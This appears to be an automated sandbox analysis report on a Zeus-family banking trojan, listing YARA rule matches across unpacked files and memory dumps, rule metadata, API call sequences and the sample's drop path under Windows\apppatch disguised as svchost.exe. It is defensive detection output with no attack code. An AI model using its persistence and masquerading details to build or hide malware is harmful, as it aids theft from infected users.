Source: 26.2.nFjEHtbDTFjy.exe.2490000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.nFjEHtbDTFjy.exe.29f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.OjKmJJm2YT.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.30.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.37f0000.29.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1734478353.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1743033227.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1680369624.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1733978576.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1722129332.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1674029436.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1342128080.0000000002AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1739375869.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1675730840.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1742192775.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1738952531.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1745221620.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1716460061.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1744096234.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1739760452.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1673174622.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1707472657.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1710147215.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1740206618.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1678394504.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1736767365.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1737316338.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1703776736.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1741195616.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1690060462.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1730745096.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1746920664.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1734938590.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1713404140.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1747674947.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1745970801.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1726563792.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.1744700906.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: OjKmJJm2YT.exe PID: 1956, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5368, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6928, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3816, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4976, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6472, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 3132, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 2316, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7132, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 896, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7144, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5684, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6424, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6204, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 824, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4612, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Yara match, File source: 2.3.svchost.exe.883000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.OjKmJJm2YT.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.OjKmJJm2YT.exe.83b298.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.OjKmJJm2YT.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.svchost.exe.883000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: OjKmJJm2YT.exe PID: 1956, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BB79E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02BB79E0
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BB3A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,2_2_02BB3A20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 5_2_00693A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,5_2_00693A20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 6_2_014D3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_014D3A20
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle,0_2_004021D0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004018E0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Process token adjusted: Security
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756
Source: OjKmJJm2YT.exe Static PE information: Number of sections : 13 > 10
Source: svchost.exe.0.dr Static PE information: Number of sections : 13 > 10
Source: OjKmJJm2YT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
The rule above matched in each of the following sources:
Source: 0.2.OjKmJJm2YT.exe.406400.0.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.37f0000.13.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.883000.0.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.37f0000.41.unpack, type: UNPACKEDPE
Source: 24.2.nFjEHtbDTFjy.exe.d92000.1.raw.unpack, type: UNPACKEDPE
Source: 30.2.nFjEHtbDTFjy.exe.20d2000.1.raw.unpack, type: UNPACKEDPE
Source: 5.2.nFjEHtbDTFjy.exe.632000.1.unpack, type: UNPACKEDPE
Source: 0.3.OjKmJJm2YT.exe.841298.0.unpack, type: UNPACKEDPE
Source: 21.2.nFjEHtbDTFjy.exe.2172000.1.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.883000.0.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.37f0000.38.raw.unpack, type: UNPACKEDPE
Source: 0.2.OjKmJJm2YT.exe.400000.2.unpack, type: UNPACKEDPE
Source: 21.2.nFjEHtbDTFjy.exe.2440000.2.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.37f0000.19.unpack, type: UNPACKEDPE
Source: 6.2.nFjEHtbDTFjy.exe.14d0000.2.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.37f0000.10.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.37f0000.28.unpack, type: UNPACKEDPE
Source: 16.2.nFjEHtbDTFjy.exe.2ba0000.2.unpack, type: UNPACKEDPE
Source: 30.2.nFjEHtbDTFjy.exe.2480000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.37f0000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.3.OjKmJJm2YT.exe.83b298.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
